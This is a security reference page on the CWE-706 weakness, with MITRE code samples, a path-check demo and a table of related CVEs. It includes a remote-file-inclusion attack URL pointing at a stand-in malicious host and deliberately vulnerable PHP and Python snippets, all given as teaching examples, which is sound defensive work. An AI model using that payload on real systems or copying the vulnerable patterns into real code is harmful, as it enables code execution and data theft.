
CWE-706 Use of Incorrectly-Resolved Name or Reference: vulnerability list (36)

Summary of the 36 CVEs associated with the CWE-706 (Use of Incorrectly-Resolved Name or Reference) weakness class, with AI-generated Chinese analysis.

CWE-706 is a reference-resolution error: the program uses a name or reference that does not resolve to the intended resource, so it ends up accessing an object outside its control sphere. Attackers typically manipulate input or environment variables so that the system references a malicious resource, and use that to perform unauthorized operations or steal data. Developers should strictly validate input, restrict the set of reachable resources with an allow-list, and make sure the reference is resolved in a controlled environment, so that it cannot be redirected to an external resource.

MITRE CWE official description
CWE-706 Use of Incorrectly-Resolved Name or Reference: the product uses a name or reference to access a resource, but the name or reference resolves to a resource that is outside the intended control sphere.
Common Consequences (1)
Scope: Confidentiality, Integrity. Impact: Read Application Data, Modify Application Data.
Code Examples (2)
The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it.
$dir = $_GET['module_name'];      // attacker-controlled directory name, never validated
include($dir . "/function.php");  // a URL or '..' path here resolves outside the intended module directory
Bad · PHP
victim.php?module_name=http://malicious.example.com
Attack
This script intends to read a user-supplied file from the current directory. The user inputs the relative path to the file and the script uses Python's os.path.join() function to combine the path to the current working directory with the provided path to the specified file. This results in an absolute path to the desired file. If the file does not exist when the script attempts to read it, an erro…
import os
import sys

def main():
    filename = sys.argv[1]                      # user-supplied relative path, unvalidated
    path = os.path.join(os.getcwd(), filename)  # an absolute or '..' input resolves outside the cwd
    try:
        with open(path, 'r') as f:
            file_data = f.read()
    except FileNotFoundError as e:
        print("Error - file not found")

main()
Bad · Python
import os
import sys

def main():
    filename = sys.argv[1]
    # Concatenate, then normalize so '..' segments are collapsed before the check
    path = os.path.normpath(f"{os.getcwd()}{os.sep}{filename}")
    # Accept only names that resolve inside the intended directory (trailing separator included)
    if path.startswith("/home/cwe/documents/"):
        try:
            with open(path, 'r') as f:
                file_data = f.read()
        except FileNotFoundError as e:
            print("Error - file not found")

main()
Good · Python
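As an added example (not part of the MITRE entry or of this page), the three resolution strategies side by side in Python: the join-and-trust pattern of the Bad example, the normpath-plus-prefix check of the Good example, and a realpath/commonpath variant that also covers symlinks, which normpath does not follow. The base directory and the temporary filesystem layout are constructed for the demonstration.

```python
import os
import tempfile

# Constructed base directory, standing in for the "/home/cwe/documents/"
# prefix that the CWE 'Good' example hard-codes.
BASE_DIR = "/home/cwe/documents"

def resolve_naive(base, user_path):
    """Pattern of the 'Bad' example: join and trust the result. os.path.join
    drops 'base' for an absolute user_path and never collapses '..', so the
    name can resolve to a file outside the intended directory."""
    return os.path.join(base, user_path)

def resolve_prefix_check(base, user_path):
    """Pattern of the 'Good' example: normalize, then require the base prefix.
    The trailing separator matters: without it 'documents_backup' would pass.
    Returns None when the resolved name falls outside base."""
    path = os.path.normpath(f"{base}{os.sep}{user_path}")
    return path if path.startswith(base.rstrip(os.sep) + os.sep) else None

def resolve_contained(base, user_path):
    """Hardened variant: resolve symlinks on both sides with realpath and
    compare directory ancestry with commonpath instead of string prefixes.
    Returns None when the name resolves outside base."""
    real_base = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(real_base, user_path))
    try:
        inside = os.path.commonpath([real_base, candidate]) == real_base
    except ValueError:  # paths on different drives (Windows)
        inside = False
    return candidate if inside else None

def symlink_escape_demo():
    """Constructed filesystem case: a symlink inside the base directory that
    points outside it. normpath does not follow symlinks, so the prefix check
    accepts 'link/secret'; realpath follows it, so the contained check rejects.
    Returns (prefix_check_accepted, contained_check_accepted)."""
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "documents")
        outside = os.path.join(tmp, "outside")
        os.mkdir(base)
        os.mkdir(outside)
        os.symlink(outside, os.path.join(base, "link"))
        return (resolve_prefix_check(base, "link/secret") is not None,
                resolve_contained(base, "link/secret") is not None)
```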
| CVE ID | Title | Project | CVSS | Risk level | Published |
|---|---|---|---|---|---|
| CVE-2026-40912 | Traefik StripPrefixRegex path confusion leading to authentication bypass | traefik | 8.2 (AI) | High (AI) | 2026-04-30 |
| CVE-2026-41402 | OpenClaw security vulnerability | OpenClaw | 4.2 | Medium | 2026-04-28 |
| CVE-2026-42254 | Hickory DNS security vulnerability | Hickory DNS | 4.0 | Medium | 2026-04-26 |
| CVE-2026-41354 | OpenClaw security vulnerability | OpenClaw | 3.7 | Low | 2026-04-23 |
| CVE-2026-35358 | uutils coreutils security vulnerability | coreutils | 4.4 | Medium | 2026-04-22 |
| CVE-2026-35666 | OpenClaw security vulnerability | OpenClaw | 8.8 | High | 2026-04-10 |
| CVE-2026-35635 | OpenClaw security vulnerability | OpenClaw | 4.8 | Medium | 2026-04-09 |
| CVE-2026-33732 | srvx security vulnerability | srvx | 4.8 | Medium | 2026-03-26 |
| CVE-2026-33490 | H3 security vulnerability | h3 | 3.7 | Low | 2026-03-26 |
| CVE-2026-1230 | GitLab Enterprise Edition (EE) and GitLab Community Edition (CE) security vulnerability | GitLab | 4.1 | Medium | 2026-03-11 |
| CVE-2026-30856 | WeKnora security vulnerability | WeKnora | 5.9 | Medium | 2026-03-07 |
| CVE-2026-25890 | File Browser security vulnerability | filebrowser | 8.1 | High | 2026-02-09 |
| CVE-2026-25067 | SmarterTools SmarterMail security vulnerability | SmarterMail | 9.8 (AI) | Critical (AI) | 2026-01-29 |
| CVE-2025-13437 | zx security vulnerability | zx | 5.5 | - | 2025-11-20 |
| CVE-2025-62378 | commandKit security vulnerability | commandkit | 6.1 | Medium | 2025-10-15 |
| CVE-2025-58362 | Hono security vulnerability | hono | 7.5 | High | 2025-09-04 |
| CVE-2025-30357 | NamelessMC security vulnerability | Nameless | 7.3 | High | 2025-04-18 |
| CVE-2025-29914 | OWASP Coraza WAF security vulnerability | coraza | 5.4 | Medium | 2025-03-20 |
| CVE-2024-52515 | Nextcloud security vulnerability | security-advisories | 5.7 | Medium | 2024-11-15 |
| CVE-2024-51746 | Gitsign security vulnerability | gitsign | 6.5 | - | 2024-11-05 |
| CVE-2024-45305 | gitoxide security vulnerability | gitoxide | 2.5 | Low | 2024-09-02 |
| CVE-2024-35198 | TorchServe security vulnerability | serve | 9.8 | Critical | 2024-07-18 |
| CVE-2023-42125 | Avast Premium Security security vulnerability | Premium Security | 7.8 | - | 2024-05-03 |
| CVE-2024-27295 | Directus security vulnerability | directus | 8.2 | High | 2024-03-01 |
| CVE-2024-27292 | Docassemble security vulnerability | docassemble | 7.5 | High | 2024-02-29 |
| CVE-2023-42451 | Mastodon security vulnerability | mastodon | 7.4 | High | 2023-09-19 |
| CVE-2023-28643 | Nextcloud security vulnerability | security-advisories | 5.5 | Medium | 2023-03-30 |
| CVE-2023-28628 | lambdaisland uri input validation error vulnerability | uri | 5.4 | Medium | 2023-03-27 |
| CVE-2022-31089 | Parse Server security vulnerability | parse-server | 7.5 | High | 2022-06-27 |
| CVE-2022-27778 | curl security vulnerability | https://github.com/curl/curl | 8.1 | - | 2022-06-01 |

CWE-706 (Use of Incorrectly-Resolved Name or Reference) is a common weakness class; this platform lists 36 CVEs associated with it.